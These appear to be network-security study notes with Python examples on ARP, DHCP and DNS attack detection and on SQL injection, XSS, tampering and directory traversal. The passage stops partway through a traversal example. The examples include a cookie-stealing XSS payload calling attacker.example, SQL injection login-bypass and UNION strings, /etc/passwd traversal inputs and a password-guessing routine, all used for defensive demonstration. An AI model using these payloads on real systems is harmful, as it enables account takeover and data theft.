
Defense In-Depth

Terminologies related to Network Security Attacks

Asset – anything of interest to an attacker: a tangible or intangible resource of an organization with monetary value, which an attacker targets in order to gain control of it, compromise its security, etc. Examples of assets include software, systems, people, data, and servers.

Threat – a potential negative event that can cause damage to an asset. Examples of threats: an attacker can steal sensitive data of an organization, cause a server to shut down, trick an employee into revealing sensitive information, or infect a system with malware.

Threat sources landscape:

Natural – fires, floods, power failures

Unintentional – unskilled administrators, accidents, lazy or untrained employees

Intentional, internal – fired employees, disgruntled employees, service providers, contractors

Intentional, external – hackers, criminals, terrorists, foreign intelligence agents, corporate raiders

Threat actor – an individual or group that breaks into a system to achieve a specific goal. Types of threat actors:

Hacktivists – individuals who promote a political agenda by hacking, especially by defacing or disabling websites.

Cyber terrorists – individuals with a wide range of skills, motivated by religious or political beliefs, who create threats of large-scale disruption of computer networks.

Suicide hackers – individuals who aim to bring down critical infrastructure for a "cause" and are not deterred by jail terms or other kinds of punishment.

State-sponsored hackers – individuals employed by a government to penetrate other governments' information systems, gather top-secret information, and damage those systems.

Organized hackers – professional hackers who attack systems for profit.

Script kiddies – unskilled hackers who compromise systems by running scripts, tools, and software developed by actual hackers.

Industrial spies – individuals who attack companies for commercial purposes.

Insider threat – a threat that originates from people within the organization, such as disgruntled employees, terminated employees, and undertrained staff.

Vulnerability – the existence of a weakness in an asset that can be exploited by threat agents. Common causes of vulnerabilities: hardware or software misconfiguration, insecure or poor design of the network and application, inherent technology weaknesses, and a careless approach by end users.

Examples of network security vulnerabilities: TCP/IP protocol vulnerabilities – HTTP, FTP, ICMP, SNMP, and SMTP were designed without built-in authentication or confidentiality and are inherently insecure.

OS vulnerabilities – operating systems ship with insecure defaults and are often left unpatched.

Network device vulnerabilities – network devices such as routers, firewalls, and switches can be vulnerable due to a lack of password protection, a lack of authentication, insecure routing protocols, and firewall vulnerabilities.

User account vulnerabilities – originating from the insecure transmission of user account details such as usernames and passwords over the network.

System account vulnerabilities – originating from the setting of weak passwords for system accounts.

Internet service misconfiguration – misconfiguring Internet services can pose serious security risks; for example, enabling JavaScript where it is not needed, or misconfiguring IIS, Apache, FTP, and Terminal Services, can create security vulnerabilities in the network.

Default passwords and settings – leaving network devices and products with their default passwords and settings.

Network devices misconfiguration – Misconfiguring the network devices

Unwritten Policy – Unwritten security policies are difficult to implement and enforce

Lack of Continuity – Lack of continuity in implementing and enforcing the security policy

Politics – Politics may cause challenges for implementation of a consistent security policy

Lack of awareness – Lack of awareness of the security policy

Risk

Risk refers to the potential loss or damage that can occur when a threat to an asset exists in the presence of a vulnerability that can be exploited.

Risk examples: disruption or complete shutdown of the business, loss of privacy, legal liability, loss of productivity, data loss or theft, reputation damage, and loss of consumer confidence.

Representation of risk: Risk = Asset + Threat + Vulnerability (a risk exists only where all three are present).

An attack is an action initiated to exploit one or more vulnerabilities in order to actualize a threat. Attack = Motive (Goal) + Methods (TTPs) + Vulnerability

A motive originates from the notion that the target system stores or processes something valuable, and this leads to a threat of an attack on the system.

Examples of Motives behind Cyber Attacks:

Disrupting business continuity, information theft, manipulating data, damaging the reputation of the target, creating fear and chaos by disrupting critical infrastructure, causing financial loss to the target, propagating religious or political beliefs, achieving a state's military objectives, revenge, demanding ransom.

Methods (TTPs)

Attackers use various attack techniques to exploit vulnerabilities in a computer system, or in its security policies and controls, to achieve their motives.

The term Tactics, Techniques, and Procedures (TTPs) refers to the patterns of activities and methods associated with specific threat actors or groups of threat actors.

Tactics are defined as the strategy adopted by an attacker to perform the attack from beginning to end.

Techniques are defined as the technical methods used by an attacker to achieve intermediate results during the attack.

Procedures are defined as the systematic approach adopted by threat actors to launch an attack.

Network-level Security Attacks

The exploitation of the target network begins with reconnaissance

In recon attacks, attackers attempt to discover information about the target network

Attackers can use the following techniques to gather network information about targets:

Social Engineering

Port Scanning

DNS Footprinting

Ping Sweeping.

Network information obtained using recon attacks:

Domain Name

Internal Domain Names

Network Blocks

IP Addresses of the Reachable Systems

Rogue Websites / Private Websites

Open Ports

Versions of Running OSes

Running TCP and UDP Services

Access Control Mechanisms and ACLs

Networking Protocols

VPN Points

Running Firewalls

Analog/Digital Telephone Numbers

Authentication Mechanisms

System Enumeration

Network Sniffing Attack, sniffing is a process of monitoring and capturing all data packets passing through a given network using sniffing tools. Attackers use various sniffing utilities to sniff network traffic and gather sensitive information.

1. Man-in-the-Middle Attack

In this attack, the intruder deploys a station between the client and server communication system to intercept the messages being exchanged.

The attacker uses different techniques to split the TCP connection into two connections: 1. a client-to-attacker connection, and 2. an attacker-to-server connection.

Interception of the TCP connection enables the attacker to read, modify, and insert fraudulent data into the intercepted communication.

In the case of an HTTP transaction, the TCP connection between the client and the server is targeted.

2. Password Attack

An attacker attempts to exploit weaknesses to crack passwords

Use of common passwords makes a system or application vulnerable to password cracking attacks. The most common passwords used are: password, pa$$w0rd, root, administrator, admin, Test, guest, qwerty, or personal information such as a name, birthday, and names of children.

Attackers use various techniques such as brute-force, social engineering, spoofing, phishing, malware, sniffing, and keylogging to acquire passwords.

Attackers begin by cracking passwords to trick network devices into assuming they are valid users.
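As an added example (not part of the original notes), the dictionary attack below shows why the common passwords listed above fall immediately: against an unsalted fast hash, each guess costs one SHA-256, and the cheap variants attackers try first (capitalisation, leet substitutions, a digit suffix) are generated on the fly. The same attack against a salted, slow PBKDF2 hash still works, but each guess now costs the configured number of iterations and must be repeated per user. The word list, the mutation rules and the iteration count used for the demonstration are assumptions chosen for this example.

```python
import hashlib
import hmac
import os

# Constructed word list: the common passwords from the notes plus a couple of usual suspects.
COMMON_PASSWORDS = ["password", "pa$$w0rd", "root", "administrator", "admin",
                    "test", "guest", "qwerty", "letmein", "welcome"]


def mutations(word):
    """Yield the word plus the cheap variants attackers try first: capitalised, leet-speak, common suffixes."""
    bases = {word, word.capitalize(), word.translate(str.maketrans("aeios", "4310$"))}
    for base in bases:
        yield base
        for suffix in ("1", "123", "!", "2024"):
            yield base + suffix


def unsalted_sha256(password):
    """What a weak system stores: one fast, unsalted hash per password."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(target_hex, wordlist):
    """Dictionary attack on an unsalted fast hash: one SHA-256 per candidate, trivially cheap."""
    for word in wordlist:
        for candidate in mutations(word):
            if unsalted_sha256(candidate) == target_hex:
                return candidate
    return None


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, slow hash (PBKDF2-HMAC-SHA256). Returns (salt, digest)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def verify_pbkdf2(password, salt, digest, iterations=600_000):
    """Constant-time comparison so the check itself does not leak which bytes matched."""
    return hmac.compare_digest(hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations), digest)


def crack_pbkdf2(salt, digest, wordlist, iterations):
    """Same dictionary attack against PBKDF2: every guess costs `iterations` HMACs and the per-user
    salt defeats precomputed tables, so the attacker pays the full cost per user, per guess."""
    for word in wordlist:
        for candidate in mutations(word):
            if verify_pbkdf2(candidate, salt, digest, iterations):
                return candidate
    return None


if __name__ == "__main__":
    print(crack_unsalted(unsalted_sha256("Qwerty123"), COMMON_PASSWORDS))   # Qwerty123
    salt, digest = pbkdf2_hash("admin123", iterations=2_000)               # low count only for the demo
    print(crack_pbkdf2(salt, digest, COMMON_PASSWORDS, 2_000))             # admin123, but far slower per guess
```

The point of the second half is not that PBKDF2 is uncrackable (a password from this list is found either way) but that the cost per guess is what turns a dictionary attack from milliseconds into something a defender can notice or make uneconomic; a real deployment keeps the iteration count high and the password out of the list.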

3. Privilege Escalation Attack

An attacker can gain access to a network using a non-admin user account, and subsequently gain administrative privileges.

The attacker performs a privilege escalation attack, which exploits design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.

The escalated privileges allow an attacker to view private information, delete files, or install malicious programs such as viruses, trojans, worms, etc.

Types of privilege escalation:

Vertical privilege escalation – moving from a user account to an account with higher privileges.

Horizontal privilege escalation – moving from one user account to another user account with the same level of privileges.

4. DNS Poisoning Attack

Domain Name System (DNS) poisoning is the unauthorized manipulation of the IP addresses held in a DNS cache.

DNS stores domain-name-to-IP-address translations for network devices; resolvers cache these records.

A corrupted DNS cache redirects a user's request to a malicious website to perform illegal activities.

If a victim types www.google.com, the poisoned cache returns the attacker's IP address and the request is redirected to a fake website imitating www.google.com.
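Added example (not from the original notes): a minimal stub resolver that builds DNS queries, parses A-record responses, and accepts a reply into its cache only if the source address, transaction ID, destination port and question all match a query it actually sent. Forged replies that guess the transaction ID wrong, come from the wrong address, or answer a different name are dropped; this is the matching that a cache-poisoning attacker has to beat. The upstream address 9.9.9.9 and the sample names and IPs are assumptions for the example; real resolvers additionally apply bailiwick rules and DNSSEC, which this code does not implement.

```python
import secrets
import struct


def encode_name(name):
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.strip(".").split(".")) + b"\x00"


def decode_name(msg, off):
    """Decode a (possibly compressed) name at offset; returns (name, next_offset)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                      # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode())
        off += 1 + length


def build_query(txid, name):
    """Standard recursive query for an A record: header, then QNAME/QTYPE=A/QCLASS=IN."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(txid, name, ip, ttl=300):
    """Response with one A record; the answer name is a pointer (0xC00C) back to the question."""
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return hdr + question + answer


def parse_response(msg):
    txid, _flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                            # skip QTYPE + QCLASS
    addrs = []
    for _ in range(an):
        _name, off = decode_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if (rtype, rclass) == (1, 1):                   # A record, class IN
            addrs.append(".".join(str(x) for x in rdata))
    return {"txid": txid, "qname": qname, "addrs": addrs}


class StubResolver:
    """Caches only answers whose (txid, destination port, question) match a query sent to the upstream."""

    def __init__(self, upstream_ip):
        self.upstream_ip = upstream_ip
        self.pending = {}       # (txid, source_port) -> qname awaiting an answer
        self.cache = {}

    def send_query(self, name):
        txid = secrets.randbelow(1 << 16)                       # 16 bits of txid entropy ...
        sport = 1024 + secrets.randbelow(65536 - 1024)          # ... plus a random source port
        self.pending[(txid, sport)] = name.lower()
        return txid, sport, build_query(txid, name)

    def receive(self, src_ip, dst_port, msg):
        """True if the response was accepted into the cache, False if dropped as forged or unsolicited."""
        r = parse_response(msg)
        expected = self.pending.get((r["txid"], dst_port))
        if src_ip != self.upstream_ip or expected is None or expected != r["qname"].lower():
            return False
        del self.pending[(r["txid"], dst_port)]                 # one answer per question; replays are rejected
        self.cache[expected] = r["addrs"]
        return True
```

With a fixed source port the attacker only has to guess 16 bits of transaction ID before the real answer arrives; randomising the port as well is what made the classic forged-response attack impractical without a further weakness.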

5. ARP Poisoning Attack

Address Resolution Protocol (ARP) is a protocol used for mapping an IP address to the physical (MAC) address recognized on the local network.

ARP spoofing/poisoning involves sending a large number of forged ARP entries to the target machine's ARP cache, typically claiming the gateway's IP address for the attacker's MAC so that the victim's traffic is routed through the attacker.
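Added example, not part of the original notes: a small ARP frame builder and parser, and a detector that walks ARP replies and flags any IP address that is suddenly claimed by a different MAC than the one already bound to it (the signature of a poisoned reply). The frames are constructed for the example, not captured from a real network, and the gateway, victim and attacker addresses are assumptions; in practice the known bindings would be seeded from DHCP leases or static configuration.

```python
import struct


def _mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """Ethernet II frame carrying an ARP packet (RFC 826 layout). op 1 = request, 2 = reply.
    eth_dst defaults to target_mac; requests use the broadcast address as the frame destination."""
    eth = _mac_bytes(eth_dst or target_mac) + _mac_bytes(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)       # HTYPE Ethernet, PTYPE IPv4, HLEN 6, PLEN 4
    arp += _mac_bytes(sender_mac) + _ip_bytes(sender_ip)
    arp += _mac_bytes(target_mac) + _ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None for non-ARP frames."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return op, mac(frame[22:28]), ip(frame[28:32]), mac(frame[32:38]), ip(frame[38:42])


def detect_arp_poisoning(frames, known_bindings=None):
    """Flag every ARP reply whose sender IP is already bound to a different MAC.
    known_bindings: dict ip -> mac (e.g. from DHCP leases); unknown IPs are learned on first sight."""
    table = dict(known_bindings or {})
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, smac, sip, _tmac, _tip = parsed
        if op != 2:                     # replies are what the classic attack injects into caches
            continue
        bound = table.setdefault(sip, smac)
        if bound != smac:
            alerts.append({"ip": sip, "expected_mac": bound, "claimed_mac": smac})
    return alerts


# Constructed sample traffic: a normal request/reply for the gateway, then a forged reply
# from the attacker claiming the gateway's IP (gateway impersonation).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.50", "aa:bb:cc:00:00:50"
ATTACKER_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp(1, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP, eth_dst="ff:ff:ff:ff:ff:ff"),
    build_arp(2, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),      # legitimate reply
    build_arp(2, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),     # poisoned reply
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_FRAMES):
        print(alert)
```

A switch feature such as dynamic ARP inspection does the same comparison in hardware against the DHCP snooping table; the detector above is the software equivalent a sensor on a mirror port could run.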

6. DHCP Starvation Attack

Dynamic Host Configuration Protocol (DHCP) is a configuration protocol that assigns valid IP addresses to host systems out of a pre-assigned DHCP pool.

A DHCP starvation attack inundates the DHCP server with fake DHCP requests, each carrying a different spoofed client MAC address, so that all the available IP addresses in the pool are used up.

This results in a denial-of-service attack, where the DHCP server cannot issue new IP addresses to genuine host requests

New clients cannot obtain an address and therefore cannot access the network.

7. DHCP Spoofing Attack

DHCP servers assign IP addresses to client dynamically

An attacker places a rogue DHCP server between the client and the real DHCP server

When a client sends a request, the attacker's rogue server intercepts the communication and acts as a DHCP server by replying with fake IP configuration.

DORA – DHCP Discover (broadcast from the client), DHCP Offer (from the server), DHCP Request (broadcast from the client), DHCP ACK (from the server). The client normally takes the first offer it receives, which is why a rogue server on the same segment that answers faster than the real one succeeds.

By installing a rogue DHCP server, the attacker can hand out incorrect TCP/IP settings, such as:

Wrong default gateway – the attacker becomes the gateway

Wrong DNS server – the attacker becomes the DNS server

Wrong IP address, or DoS through spoofed IP settings
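Added example covering both the DHCP starvation and the DHCP spoofing sections above (it is not code from the original notes): a parser for the DHCP options field (message type 53, server identifier 54, router 3, DNS 6) and a detector that raises a starvation alert when many distinct client MACs send DISCOVERs inside a short window, and a rogue-server alert when an OFFER or ACK carries a server identifier that is not on the allow-list. The traffic is constructed as (timestamp, client MAC, raw options) tuples rather than full 240-byte DHCP packets, and the legitimate server 192.168.1.1, the rogue 192.168.1.66, the window and the threshold are assumptions for the example.

```python
from collections import deque

MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def parse_options(raw):
    """Parse the DHCP options field (RFC 2132 TLV): 0 = pad, 255 = end, else code, length, value."""
    opts, i = {}, 0
    while i < len(raw):
        code = raw[i]
        if code == 0:
            i += 1
            continue
        if code == 255:
            break
        length = raw[i + 1]
        opts[code] = raw[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def _ip(b):
    return ".".join(str(x) for x in b)


def summarize(ts, client_mac, raw_options):
    """Reduce one DHCP message to the fields the detector needs."""
    o = parse_options(raw_options)
    return {
        "ts": ts, "mac": client_mac,
        "type": MSG_TYPES.get(o.get(53, b"\x00")[0], "OTHER"),
        "server": _ip(o[54]) if 54 in o else None,
        "router": _ip(o[3]) if 3 in o else None,
        "dns": _ip(o[6]) if 6 in o else None,
    }


def analyze_dhcp(messages, allowed_servers, window=1.0, threshold=50):
    """messages: iterable of (timestamp, client_mac, raw_options).
    Starvation: >= threshold distinct client MACs sending DISCOVER within `window` seconds.
    Rogue server: OFFER/ACK whose server identifier (option 54) is not in allowed_servers."""
    alerts, recent, starvation_reported = [], deque(), False
    for ts, mac, raw in sorted(messages, key=lambda m: m[0]):
        m = summarize(ts, mac, raw)
        if m["type"] == "DISCOVER":
            recent.append((ts, mac))
            while ts - recent[0][0] > window:          # slide the window
                recent.popleft()
            distinct = len({entry[1] for entry in recent})
            if distinct >= threshold and not starvation_reported:
                starvation_reported = True
                alerts.append({"kind": "starvation", "distinct_macs": distinct, "ts": ts})
        elif m["type"] in ("OFFER", "ACK") and m["server"] not in allowed_servers:
            alerts.append({"kind": "rogue_server", "server": m["server"],
                           "router": m["router"], "dns": m["dns"], "ts": ts})
    return alerts


# Helpers to construct sample messages for the example (not captured traffic).
def _opt(code, value):
    return bytes([code, len(value)]) + value


def _ip4(s):
    return bytes(int(x) for x in s.split("."))


def discover(ts, mac):
    return ts, mac, _opt(53, b"\x01") + b"\xff"


def offer(ts, mac, server, router, dns):
    return ts, mac, (_opt(53, b"\x02") + _opt(54, _ip4(server)) + _opt(3, _ip4(router))
                     + _opt(6, _ip4(dns)) + b"\xff")


LEGIT_SERVER = "192.168.1.1"
ROGUE = "192.168.1.66"      # attacker's host: offers itself as gateway and DNS
# 300 DISCOVERs from 300 different spoofed MACs in three seconds, then one real client
# whose request is answered by the rogue server before the real one.
SAMPLE = [discover(i * 0.01, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}") for i in range(300)]
SAMPLE += [
    discover(5.00, "aa:bb:cc:00:00:01"),
    offer(5.05, "aa:bb:cc:00:00:01", ROGUE, ROGUE, ROGUE),
    offer(5.10, "aa:bb:cc:00:00:01", LEGIT_SERVER, LEGIT_SERVER, LEGIT_SERVER),
]

if __name__ == "__main__":
    for a in analyze_dhcp(SAMPLE, {LEGIT_SERVER}):
        print(a)
```

The allow-list check is what DHCP snooping on a switch does per port (only trusted ports may source OFFER/ACK); the sliding window is the software form of the per-port DHCP rate limit that defends against starvation.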

8. MAC Spoofing Attack

A MAC spoofing attack is launched by sniffing a network for MAC addresses of clients that are actively associated with a switch port, and re-using one of those addresses.

By intercepting the network traffic, the attacker replicates a legitimate user’s MAC address to receive all the traffic intended for the specific user.

This attack enables an attacker to gain access to the network by faking the identity of another person who is already on the network.

Attacker sniffs the network for MAC addresses of the currently associated users and then uses one of those MAC addresses to attack other users associated to the same switch port.

9. Network-based Denial-of-Service Attack (DoS)

In a network-based DoS attack, the attacker sends a large amount of traffic to the target network, thereby exhausting the victim's connection resources.

The attacker does this by exploiting the existing implementation of network protocols.

Examples of such DoS attacks include:

TCP SYN flooding, UDP flooding, ICMP Smurf flooding, intermittent flooding

10. Distributed Denial-of-Service Attack (DDoS)

A DDoS attack involves a multitude of compromised systems attacking a single target, thereby causing a denial of service for legitimate users.

DDoS attacks can disable an entire network and hinder business operations, causing financial loss and damage to reputation.

An attacker exploits vulnerabilities in systems to infect them with malware and turn them into bots; the resulting botnet is controlled from a bot master (command and control) and used to attack the target or to take control of further systems.

Two types of DDoS: network-centric attacks overload a service by consuming bandwidth; application-centric attacks overload a server by inundating it with requests that are expensive to process.

11. Malware Attack

Malware is software or malicious code that is installed on a system without the user's knowledge.

A malware attack disrupts services, damages systems, gathers sensitive information, etc.

Examples of malware include viruses, trojans, adware, spyware, rootkits, and backdoors.

Virus – A self-replicating program that attaches itself to another program, computer boot sector, or a document.

Spyware – A piece of software code that extracts user information and send it to attackers.

Trojan – A program that appears to be legitimate or useful software but contains hidden and harmful code

Rootkit – Malicious software that conceals certain activities from detection by the operating system

Adware – Software that tracks the user's browsing patterns for marketing purposes and displays advertisements

Backdoor – A program that enables attackers to bypass authentication checks such as by gaining administrative privileges without passwords.

12. Advanced Persistent Threats (APTs)

An Advanced Persistent Threat (APT) is a type of network attack in which an attacker gains unauthorized access to a target network and remains there undetected for a long period of time.

The main objective behind these attacks is to obtain sensitive information rather than to sabotage the organization and its network.

Information obtained during APT attacks

Classified documents

User credentials

Employee or customer personal information

Network information

Transaction Information

Credit card information

Organization business strategy information

Control system access information

Typical dwell time cited: 208 days before the intrusion is detected.

Application-level attack techniques

1. SQL Injection Attack

SQL injection attacks use a series of malicious SQL queries to directly manipulate a database.

An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data

SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

This attack is possible only when the application executes dynamic SQL statements or stored procedures with arguments built from user input.
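Added example, not from the original notes: a login check written the vulnerable way (dynamic SQL built from the form fields) beside the parameterised version, run against a constructed in-memory SQLite table. Three payloads show the bypass, the tautology and a UNION that pulls another user's password out through the login form; the same inputs are inert against the bound-parameter query. Passwords are stored in clear only to keep the example short; a real table stores salted slow hashes.

```python
import sqlite3


def make_db():
    """Constructed sample data: two users in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
                   [("alice", "correct horse", 1), ("bob", "hunter2", 0)])
    return db


def login_vulnerable(db, username, password):
    """Dynamic SQL built from user input: quotes and comments in the input become part of the statement."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterised query: the driver binds the values, so the same inputs stay plain data."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


# Payloads typed into the username field of the login form
BYPASS = "alice' --"                                                   # comments out the password check
TAUTOLOGY = "' OR '1'='1"                                              # true for every row
EXFIL = "' UNION SELECT password FROM users WHERE username = 'alice' --"   # returns alice's password as the "username"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS, "wrong"))      # alice: logged in without the password
    print(login_vulnerable(db, EXFIL, "wrong"))       # correct horse: data read straight out of the table
    print(login_safe(db, BYPASS, "wrong"))            # None
```

The vulnerable function is the pattern the paragraph above describes (dynamic statements whose arguments come from the request); parameterisation removes the attack regardless of how the input is quoted, which input filtering alone does not.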


2. Cross-site Scripting (XSS) Attack

Cross-site scripting (XSS) attacks exploit vulnerabilities in dynamically generated web pages, which enable attackers to inject client-side script into web pages viewed by other users.

It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering.

Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on the victim's system by hiding it within legitimate requests.
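Added example (not code from the original notes): a search page that reflects the query parameter into the HTML body and into an attribute value, first unescaped and then with context-appropriate encoding, plus a small checker built on Python's HTMLParser that reports whether the reflected input produced a script tag or an event-handler attribute. The attacker host attacker.example and the two payloads are assumptions for the example. JSON-encoding data placed inside a script block is shown separately because HTML entity escaping is the wrong tool in that context.

```python
import html
import json
from html.parser import HTMLParser

# Constructed payloads: one for the HTML body context, one that breaks out of an attribute value.
PAYLOAD_BODY = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)'


def search_page_vulnerable(query):
    """Reflects the raw parameter into the page body and an input attribute."""
    return (f"<p>Results for: {query}</p>\n"
            f'<input name="q" value="{query}">')


def search_page_safe(query):
    """Same page with output encoding: & < > \" ' become entities, so the browser sees text, not markup."""
    safe = html.escape(query, quote=True)
    return (f"<p>Results for: {safe}</p>\n"
            f'<input name="q" value="{safe}">')


def script_data_safe(obj):
    """Data embedded in a <script> block: JSON-encode it and neutralise '</' so the block cannot be closed early."""
    return "<script>var data = " + json.dumps(obj).replace("</", "<\\/") + ";</script>"


class ScriptSniffer(HTMLParser):
    """Records script tags and on* event-handler attributes the parser actually sees as markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        self.findings += [f"{tag}@{name}" for name, _ in attrs if name.startswith("on")]


def injected_markup(page):
    sniffer = ScriptSniffer()
    sniffer.feed(page)
    return sniffer.findings


if __name__ == "__main__":
    print(injected_markup(search_page_vulnerable(PAYLOAD_BODY)))   # ['script tag']
    print(injected_markup(search_page_vulnerable(PAYLOAD_ATTR)))   # ['input@onfocus']
    print(injected_markup(search_page_safe(PAYLOAD_BODY)))         # []
```

Encoding at output time, chosen per context (HTML body, attribute, script, URL), is the primary XSS defence; input validation and a Content-Security-Policy header are additional layers, not replacements.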


3. Parameter Tampering Attack

A web parameter tampering attack involves manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, or the price and quantity of products.

A parameter tampering attack exploits weaknesses in integrity and logic validation mechanisms, and may lead on to XSS, SQL injection, etc.
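Added example, not from the original notes: a checkout handler that trusts the client-supplied price beside one that recomputes it from the server-side catalogue and validates the quantity, and an HMAC signature over the parameters so that any value edited in transit is detected. The catalogue, SKUs, prices, quantity limits and the secret key are assumptions for the example; the key would come from configuration, not source code, in a real service.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

SERVER_SECRET = b"example-only-secret-load-from-config"    # assumption for the example
CATALOG = {"sku-100": 49.99, "sku-200": 199.00}            # constructed server-side price list


def checkout_vulnerable(form):
    """Trusts the hidden 'price' field the browser sent back: editing it in the request changes the charge."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def checkout_safe(form):
    """Price comes from the catalogue, never from the client; quantity is range-checked."""
    price = CATALOG[form["sku"]]                           # KeyError for an unknown SKU: reject the order
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError(f"quantity out of range: {qty}")
    return round(price * qty, 2)


def sign_params(params):
    """Canonical query string plus an HMAC-SHA256 tag, for parameters that must round-trip unchanged."""
    body = urlencode(sorted(params.items()))
    tag = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}&sig={tag}"


def verify_params(query):
    """Return the parameters as a dict if the tag matches, None if anything was altered or the tag is missing."""
    body, _, tag = query.rpartition("&sig=")
    expected = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return {k: v[0] for k, v in parse_qs(body).items()}


if __name__ == "__main__":
    tampered_form = {"sku": "sku-200", "qty": "1", "price": "0.01"}   # attacker edited the hidden price
    print(checkout_vulnerable(tampered_form))      # 0.01
    print(checkout_safe(tampered_form))            # 199.0
    signed = sign_params({"sku": "sku-200", "qty": "1"})
    print(verify_params(signed.replace("qty=1", "qty=9")))   # None: tampering detected
```

Signing only detects modification; it does not make a value secret, and it does not replace recomputing anything the server can derive itself (the price here). Use the signature for state that genuinely has to travel through the client, such as a pagination cursor or a multi-step form token.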


4. Directory Traversal Attack

Directory traversal enables attackers to access restricted directories including application source code, configuration, and critical system files, and execute commands outside the webserver’s root directory.

Attackers access files located outside the web publishing directory using directory traversal.

Attackers manipulate variables that reference files with "dot-dot-slash (../)" sequences and their variations (URL-encoded, double-encoded, backslash).
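Added example, not part of the original notes: the vulnerable join-and-normalise pattern beside a resolver that decodes the request, resolves the real path and then refuses anything that does not remain inside the document root. The document root /var/www/html and the list of traversal attempts are assumptions constructed for the example; nothing is read from disk.

```python
import os
from pathlib import Path
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"    # assumed document root for the example


def resolve_vulnerable(root, requested):
    """Joins the raw request path onto the root: '../' segments climb straight out of the web root."""
    return os.path.normpath(os.path.join(root, requested))


def resolve_safe(root, requested):
    """Decode, normalise, then check the real path is still under the root; raise otherwise.
    Returns the root-relative path to serve."""
    base = Path(root).resolve()
    # Undo %2e%2e%2f, double encoding (%252e) and backslash variants before normalising.
    decoded = unquote(unquote(requested)).replace("\\", "/")
    target = (base / decoded.lstrip("/")).resolve()      # collapses '..' and follows symlinks
    if target != base and base not in target.parents:
        raise PermissionError(f"request escapes web root: {requested!r}")
    return target.relative_to(base).as_posix()


def is_served(root, requested):
    """Root-relative path if the request is allowed, None if it was rejected."""
    try:
        return resolve_safe(root, requested)
    except PermissionError:
        return None


# Constructed traversal attempts covering the variations an attacker tries.
TRAVERSAL_ATTEMPTS = [
    "../../../etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",     # URL-encoded
    "%252e%252e%252fetc/passwd",                # double-encoded
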